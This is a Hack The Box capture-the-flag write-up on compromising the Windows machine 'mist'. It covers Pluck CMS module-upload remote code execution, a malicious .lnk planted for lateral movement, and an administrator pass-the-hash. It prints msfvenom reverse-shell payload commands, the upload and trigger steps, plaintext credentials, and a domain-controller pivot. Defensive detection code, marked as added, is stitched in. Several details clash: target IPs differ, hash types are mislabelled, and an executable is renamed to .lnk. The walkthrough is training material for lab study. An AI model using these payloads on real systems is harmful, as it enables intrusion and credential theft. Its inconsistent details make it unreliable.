HTB: mist Writeup


Machine Information

Name: mist
OS: Windows
Difficulty: Insane
Points: N/A
Release Date: N/A
IP Address: 10.129.34.85
Author: D3vnomi

Machine Rating

⭐⭐⭐⭐⭐ (9.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐⭐
  • Real-world: ⭐⭐⭐⭐⭐
  • CVE: ⭐⭐⭐⭐☆
  • CTF-like: ⭐⭐⭐⭐⭐

Summary

mist is an Insane-difficulty Windows machine running Pluck CMS 4.7.18. The attack leverages CVE-2023-50564 (Pluck CMS remote code execution via module upload) to gain an initial foothold. The exploitation path involves reconnaissance and enumeration to identify the vulnerable Pluck installation, exploitation of the CMS to achieve RCE as the web user, lateral movement to the Brandon user via a crafted .lnk file that bypasses BitDefender’s security controls, and finally privilege escalation to administrator by cracking the administrator password hash.

TL;DR: Enumeration → Pluck CMS RCE → Web user access → Lateral movement via .lnk file → Administrator hash cracking → Root.


Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.34.85

Results:

80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

Service Enumeration

Hostname: mist.htb

Terminal window
echo "10.129.34.85 mist.htb" >> /etc/hosts
gobuster dir -u http://mist.htb -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://mist.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt

Discovered URLs:

  • /robots.txt
  • /data
  • /docs
  • /login.php
  • /admin.php
  • /catalog

Identified Service: Pluck CMS 4.7.18 running on Apache with XAMPP stack.

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-50564 — Pluck CMS RCE via authenticated module upload. Allows authenticated users to upload malicious PHP modules and achieve remote code execution.

Hash Discovery

A SHA-512 hash was discovered during enumeration: c81dde783f95...


Initial Foothold

Step 1: Pluck CMS Authentication

Navigate to http://mist.htb/login.php and authenticate with credentials:

  • Username: pluck
  • Password: lexypoo97

Step 2: Exploit CVE-2023-50564 - Module Upload RCE

Generate a PHP meterpreter payload and upload it as a module:

Terminal window
msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -o miao.php
zip miao.zip miao.php

Access the admin panel at http://mist.htb/admin.php?action=installmodule and upload the miao.zip module.

Step 3: Trigger Payload

Navigate to the uploaded module:

Terminal window
curl http://mist.htb/data/modules/miao/miao.php

This establishes a meterpreter session as the web user (Apache/XAMPP user).

Step 4: Generate Windows Payload

From the meterpreter shell, generate a Windows executable payload for further exploitation:

Terminal window
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=<attacker_tun0_ip> LPORT=4445 -o miao.exe
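As an added example (not part of the original writeup), this is the detection logic a defender could run over Apache access logs to flag the sequence above: a POST to admin.php?action=installmodule followed by a direct request to a PHP file under /data/modules/ from the same source address. The log lines are constructed for the demo, and the regex assumes Apache's default common/combined log format.

```python
import re
from collections import defaultdict

# Constructed Apache access log lines (not captured from the box) that model the
# Pluck CMS module-upload sequence: login, installmodule, then the module's PHP fetched.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Mar/2026:10:00:01 +0000] "POST /login.php HTTP/1.1" 302 -
10.10.14.5 - - [08/Mar/2026:10:00:20 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 1532
10.10.14.5 - - [08/Mar/2026:10:00:35 +0000] "GET /data/modules/miao/miao.php HTTP/1.1" 200 0
10.10.14.9 - - [08/Mar/2026:10:05:00 +0000] "GET /data/modules/contactform/contactform.php HTTP/1.1" 200 812
10.10.14.9 - - [08/Mar/2026:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 4410
"""

# Common Log Format prefix: client, ident, user, [timestamp], "METHOD path proto", status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
INSTALL_RE = re.compile(r'^/admin\.php\?action=installmodule')
MODULE_PHP_RE = re.compile(r'^/data/modules/([^/]+)/[^/?]+\.php')

def detect_module_upload_rce(log_text):
    """Return one alert per direct PHP hit under /data/modules/ whose source IP
    previously posted to admin.php?action=installmodule (CVE-2023-50564 pattern)."""
    installs = defaultdict(list)   # source ip -> timestamps of installmodule POSTs
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue               # unparsable line: skip rather than crash the detector
        ip, method, path = m['ip'], m['method'], m['path']
        if method == 'POST' and INSTALL_RE.match(path):
            installs[ip].append(m['ts'])
            continue
        mod = MODULE_PHP_RE.match(path)
        if mod and installs[ip]:
            alerts.append({'ip': ip, 'module': mod.group(1), 'path': path,
                           'installed_at': installs[ip][-1], 'hit_at': m['ts']})
    return alerts

if __name__ == '__main__':
    for a in detect_module_upload_rce(SAMPLE_LOG):
        print(f"ALERT {a['ip']} installed module '{a['module']}' at {a['installed_at']} "
              f"and fetched {a['path']} at {a['hit_at']}")
```

Correlating on source IP keeps legitimate module use (the second client, which never installed anything) out of the alert list.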

Lateral Movement

Brandon User Compromise via .lnk File

Brandon’s user account has an automated script (link.ps1) that monitors the C:\Common Applications directory for Windows shortcut files (.lnk). The script compares file hashes and invokes any .lnk files that don’t match its expected hash.

Exploitation Steps:

  1. Create a crafted .lnk file (e.g., Notepad.lnk) containing a reverse shell payload instead of the legitimate shortcut.

  2. Write the malicious .lnk file to C:\Common Applications:

Terminal window
# From meterpreter shell as web user
Copy-Item miao.exe "C:\Common Applications\Notepad.lnk"

  3. The script will detect the hash mismatch and invoke the .lnk file, executing the payload and granting a session as the Brandon user.

Note: This is a “race condition” — the script compares hashes and executes the file if different, making timing critical.
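As an added example (not part of the original writeup, and not Brandon's link.ps1), the same hash-comparison idea turned into a safe check: files in the watched directory are compared against a SHA-256 allowlist and must carry the Shell Link file header, and anything unknown or changed is quarantined and reported instead of invoked. The directory, the allowlist and the two sample files are constructed in a temporary folder for the demo.

```python
import hashlib, os, shutil, tempfile

# Shell Link header: HeaderSize 0x4C then LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = bytes.fromhex("4C000000" "0114020000000000C000000000000046")

def is_shell_link(path):
    """True only if the file carries the .lnk header; a renamed PE (MZ...) fails this."""
    with open(path, "rb") as f:
        return f.read(len(LNK_MAGIC)) == LNK_MAGIC

def audit_shortcuts(watch_dir, expected_hashes, quarantine_dir):
    """Compare each .lnk in watch_dir with a SHA-256 allowlist. Unknown, changed or
    non-shortcut files are moved to quarantine and reported; nothing is executed."""
    os.makedirs(quarantine_dir, exist_ok=True)
    findings = []
    for name in sorted(os.listdir(watch_dir)):
        if not name.lower().endswith(".lnk"):
            continue
        path = os.path.join(watch_dir, name)
        with open(path, "rb") as f:
            digest = hashlib.sha256(f.read()).hexdigest()
        if not is_shell_link(path):
            reason = "not a shell link (header mismatch)"
        elif expected_hashes.get(name) != digest:
            reason = "hash not in allowlist"
        else:
            continue  # known-good shortcut, leave it in place
        shutil.move(path, os.path.join(quarantine_dir, name))
        findings.append((name, reason, digest))
    return findings

def demo():
    """Constructed scenario: one allowlisted shortcut and one PE dropped as Notepad.lnk."""
    root = tempfile.mkdtemp()
    watch, quar = os.path.join(root, "Common Applications"), os.path.join(root, "quarantine")
    os.makedirs(watch)
    good = LNK_MAGIC + b"\x00" * 60                 # minimal stand-in for a real shortcut
    with open(os.path.join(watch, "Calc.lnk"), "wb") as f:
        f.write(good)
    with open(os.path.join(watch, "Notepad.lnk"), "wb") as f:
        f.write(b"MZ\x90\x00" + b"\x00" * 60)        # PE magic, renamed to look like a shortcut
    findings = audit_shortcuts(watch, {"Calc.lnk": hashlib.sha256(good).hexdigest()}, quar)
    shutil.rmtree(root)
    return findings
```

The header check matters because a hash mismatch alone cannot tell a legitimately updated shortcut from an executable that was simply renamed to .lnk.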

Security Bypass

The C:\xampp\htdocs\ path is excluded from BitDefender antivirus scanning, allowing write operations and malicious file hosting without detection.


Privilege Escalation

Administrator User Compromise

PowerShell logs reveal that the administrator runs pluck.ps1 periodically. During enumeration, the following administrator password hash was discovered:

b46782b9365344abdff1a925601e0385

Crack Administrator Password Hash

Use john to crack the hash. The --format option has to match the hash type: Raw-SHA512 applies to the 128-hex-character SHA-512 hash found during enumeration, while the 32-hex-character value above is NT-hash length (john format NT), which is why it can also be used directly in the pass-the-hash step below:

Terminal window
john --wordlist=rockyou.txt hash.txt --format=Raw-SHA512

Or use the discovered hash directly for pass-the-hash attacks.

Gain Administrator Shell

Terminal window
evil-winrm -i 192.168.100.101 -u Administrator -H b46782b9365344abdff1a925601e0385

Root Flag

Terminal window
cat C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>

Domain Escalation

From the administrator shell, pivot to the domain controller:

Terminal window
proxychains4 psexec.py Administrator@dc01.mist.htb -k -no-pass

Attack Chain Summary

graph TD
A["Port Scan: Port 80 Open"] --> B["Enumerate Web Services"]
B --> C["Identify Pluck CMS 4.7.18"]
C --> D["Authenticate to Pluck"]
D --> E["CVE-2023-50564: Module Upload RCE"]
E --> F["Meterpreter Shell as Web User"]
F --> G["Craft Malicious .lnk File"]
G --> H["Write to C:\Common Applications"]
H --> I["Brandon's Script Executes .lnk"]
I --> J["Meterpreter Shell as Brandon"]
J --> K["Obtain Administrator Password Hash"]
K --> L["Crack Hash with John"]
L --> M["Pass-the-Hash with evil-winrm"]
M --> N["Administrator Shell - Root Access"]
N --> O["Pivot to Domain Controller"]

Tools Used

nmap: Port scanning and service fingerprinting
gobuster: Directory enumeration
ffuf: Web fuzzing and subdomain enumeration
john: Password hash cracking (SHA-512)
msfvenom: Payload generation (PHP meterpreter, Windows meterpreter)
Metasploit: Multi-handler for reverse shells
evil-winrm: Windows Remote Management shell (pass-the-hash)
proxychains: Proxy chaining for domain controller pivot
psexec.py: Impacket utility for remote command execution
Burp Suite: Web application analysis
curl: HTTP requests and payload triggering
PowerShell: Windows scripting and task execution

Vulnerability Reference

1. CVE-2023-50564 (Component: Application; Severity: High; Impact: Exploitation vector)

Key Learnings

  • Thorough enumeration is critical — every open port and service can be a potential entry point.
  • Configuration files and databases often contain credentials that enable lateral movement.
  • Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Insane #CVE-2023-50564